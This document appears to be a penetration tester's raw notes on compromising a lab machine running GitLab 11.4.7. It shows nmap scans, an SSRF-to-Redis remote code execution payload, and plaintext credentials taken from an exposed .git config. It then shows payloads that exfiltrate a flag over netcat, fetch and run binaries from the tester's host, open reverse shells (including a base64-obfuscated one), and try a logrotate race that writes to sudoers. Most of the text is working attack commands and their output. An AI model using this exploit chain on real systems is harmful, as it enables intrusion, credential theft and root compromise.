MCO: 10
[pg mco usual nmap:
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 35:0f:c0:28:c9:0c:5b:59:69:99:98:b6:97:79:0a:3b (RSA)
| 256 9f:cf:bb:6e:9e:22:9c:8b:fb:b9:9e:cd:13:62:8f:59 (ECDSA)
|_ 256 c2:15:d8:98:7c:d2:dd:a4:46:f2:09:4e:08:cb:3e:12 (ED25519)
25/tcp closed smtp
80/tcp open http nginx
|_http-favicon: Unknown favicon MD5: F7E3D97F404E71D302B3239EEF48D5F2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://vanadium.pg/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
81/tcp closed hosts2-ns
110/tcp closed pop3
143/tcp closed imap
445/tcp closed microsoft-ds
5432/tcp open postgresql PostgreSQL DB 9.6.7 - 9.6.10
| ssl-cert: Subject: commonName=PostgreSQL/organizationName=GitLab/countryName=USA
| Issuer: commonName=PostgreSQL/organizationName=GitLab/countryName=USA
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-12-23T13:27:10
| Not valid after: 2029-12-20T13:27:10
| MD5: c8c8 a882 360f bb01 2ae7 d3ad 4523 8ad1
|_SHA-1: bf76 c61c 3eea 605b 1825 6e9a b1c9 1d61 037e 510d
8060/tcp open http nginx 1.12.1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.12.1
|_http-title: 404 Not Found
8090/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: Jekyll v3.8.6
| http-git:
| 172.16.10.10:8090/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
|_ http://rob:GitBlameNotMe22@localhost:/rob/robs-awesome-website.git
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Cover Template \xC2\xB7 Bootstrap
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
port 80
GitLab Community Edition 11.4.7
there’s an rce exploit
https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
poc payload:
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc 172.16.10.222 4444\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
/ssrf.git
the request passed but no netcat connection comes back - maybe because redis isn’t running on the box.
found at http://vanadium.pg:8090/.git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://rob:GitBlameNotMe22@localhost:/rob/robs-awesome-website.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
import rob’s git with this url:
http://[0:0:0:0:0:ffff:127.0.0.1]/rob/robs-awesome-website.git
imported successfully, look into git and see a passwords.txt
robert:gitpushdashdashforce
holy shit the poc actually works (tested with pingback):
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|ping 172.16.10.222\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
/ssrf.git
kali@kali:~/offsec-pg/megacorp-one/vanadium$ sudo tcpdump ip proto \\icmp -i tap0
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tap0, link-type EN10MB (Ethernet), capture size 262144 bytes
22:00:16.233404 IP vanadium.pg > 172.16.10.222: ICMP echo request, id 16518, seq 1, length 64
22:00:16.233512 IP 172.16.10.222 > vanadium.pg: ICMP echo reply, id 16518, seq 1, length 64
22:00:17.235280 IP vanadium.pg > 172.16.10.222: ICMP echo request, id 16518, seq 2, length 64
22:00:17.235381 IP 172.16.10.222 > vanadium.pg: ICMP echo reply, id 16518, seq 2, length 64
22:00:18.301558 IP vanadium.pg > 172.16.10.222: ICMP echo request, id 16518, seq 3, length 64
ok, payload with bash way doesn’t work:
bash -i >& /dev/tcp/172.16.10.222/4444 0>&1
more or less confirmed that nc doesn’t exist on the box.
download pwncat from me; this worked
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|wget http://172.16.10.204/pwncat -O /tmp/pwncat\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
/ssrf.git
chmod +x /tmp/pwncat
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|chmod +x /tmp/pwncat\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
/ssrf.git
first signs of life:
sudo nc -lvnp 445 -keep-alive
listening on [any] 445 ...
connect to [172.16.10.204] from (UNKNOWN) [172.16.10.10] 48532
exec ep-alive failed : No such file or directory
chaining commands work:
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|wget http://172.16.10.204/testchain;wget http://172.16.10.204:445/testchain\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
/ssrf.git
prepare eval + base64:
echo "wget http://172.16.10.231/nc2 -O /dev/shm/nc2;chmod +x /dev/shm/nc2;/dev/shm/nc2 -e '/bin/bash' 172.16.10.231 8060" | base64 -w0
d2dldCBodHRwOi8vMTcyLjE2LjEwLjIzMS9uYzIgLU8gL2Rldi9zaG0vbmMyO2NobW9kICt4IC9kZXYvc2htL25jMjsvZGV2L3NobS9uYzIgLWUgJy9iaW4vYmFzaCcgMTcyLjE2LjEwLjIzMSA4MDYwCg==
prepare payload:
eval `echo d2dldCBodHRwOi8vMTcyLjE2LjEwLjIzMS9uYzIgLU8gL2Rldi9zaG0vbmMyO2NobW9kICt4IC9kZXYvc2htL25jMjsvZGV2L3NobS9uYzIgLWUgJy9iaW4vYmFzaCcgMTcyLjE2LjEwLjIzMSA4MDYwCg== | base64 --decode`
got shell on port 8060…but no (root) hash.
git@vanadium:/home/robert$ whoami
git
git@vanadium:/home/robert$ locate hash.txt
bash: locate: command not found
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert,,,:/home/robert:/bin/bash
gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
git:x:998:998::/var/opt/gitlab:/bin/sh
gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
gitlab-prometheus:x:995:995::/var/opt/gitlab/prometheus:/bin/sh
git@vanadium:~/.ssh$ cat /var/opt/gitlab/gitlab-rails/etc/database.yml
# This file is managed by gitlab-ctl. Manual changes will be
# erased! To change the contents below, edit /etc/gitlab/gitlab.rb
# and run `sudo gitlab-ctl reconfigure`.
production:
adapter: postgresql
encoding: unicode
collation:
database: gitlabhq_production
pool: 10
username: "gitlab"
password:
host: "0.0.0.0"
port: 5432
socket:
sslmode:
sslcompression: 0
sslrootcert:
sslca:
load_balancing: {"hosts":[]}
prepared_statements: false
statements_limit: 1000
fdw:
logrotten doesn’t seem to work (can’t force the rotation)
for example, this completed without even forcing a logrotate:
for i in $(seq 1 10000000);do echo "aaaaaaa" >> /var/log/gitlab/gitlab-rails/production_json.log;done
$
$ cat /etc/logrotate.conf
# see "man logrotate" for details
# rotate log files weekly
weekly
# keep 4 weeks worth of backlogs
rotate 4
# create new (empty) log files after rotating old ones
create
# uncomment this if you want your log files compressed
#compress
# packages drop log rotation information into this directory
include /etc/logrotate.d
# no packages own wtmp, or btmp -- we'll rotate them here
/var/log/wtmp {
missingok
monthly
create 0664 root utmp
rotate 1
}
/var/log/btmp {
missingok
monthly
create 0660 root utmp
rotate 1
}
# system-specific logs may be configured here
so logrotate actually worked but no shell back.
refer: https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/4380
git@vanadium:/dev/shm$ cat payloadfile
if [ 998 -eq 0 ]; then (/bin/nc -e /bin/bash 172.16.10.204 8090 &); fi
.logvanadium:/dev/shm$ ./logrotten -c /var/log/gitlab/gitlab-workhorse/something.
Waiting for rotating /var/log/gitlab/gitlab-workhorse/something.log...
Renamed /var/log/gitlab/gitlab-workhorse with /var/log/gitlab/gitlab-workhorse2 and created symlink to /etc/bash_completion.d
Done!
change the payload file a little…
echo "echo 'git ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" >> payloadfile
hm..wait. try this:
echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash 172.16.10.204 8090 &); fi" > /var/log/gitlab/gitlab-workhorse/wow.sh
didn’t seem to work.
go inside /var/log/gitlab/workhorse/
echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash 172.16.10.204 8090 &); fi" > something.log.1.gz
ah, i didn’t put payload in the one that worked:
./logrotten -p ./payloadfile -c /var/log/gitlab/gitlab-workhorse/something.log
..still didn’t work, even though logrotten managed to open a symlink to /etc/bash_completion.d
echo "if [ `id -u` -eq 0 ]; then (echo "BOOM") && (echo 'git ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers &); fi" > payloadfile
still didn’t work.
intermission
this could be a clue:
[*] pro020 Processes running with root permissions......................... yes!
---
START PID USER COMMAND
22:53 9626 root /usr/sbin/exim4 -Mc 1jd3Ef-0002V4-SO
22:53 9613 root sudo -S -l
22:53 9209 root /usr/sbin/exim4 -Mc 1jd3Ed-0002OC-Ug
22:53 9194 root sudo -S -l
22:53 9188 root sendmail -t
22:53 9187 root sudo -S id
22:53 8737 root sudo -S id
22:53 11360 root runsv prometheus
22:49 6595 root sleep 600
22:49 6591 root /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper
…
sshpass -p 'GitBlameNotMe22' ssh robert@vanadium.pg
robert can sudo, and that gives us root.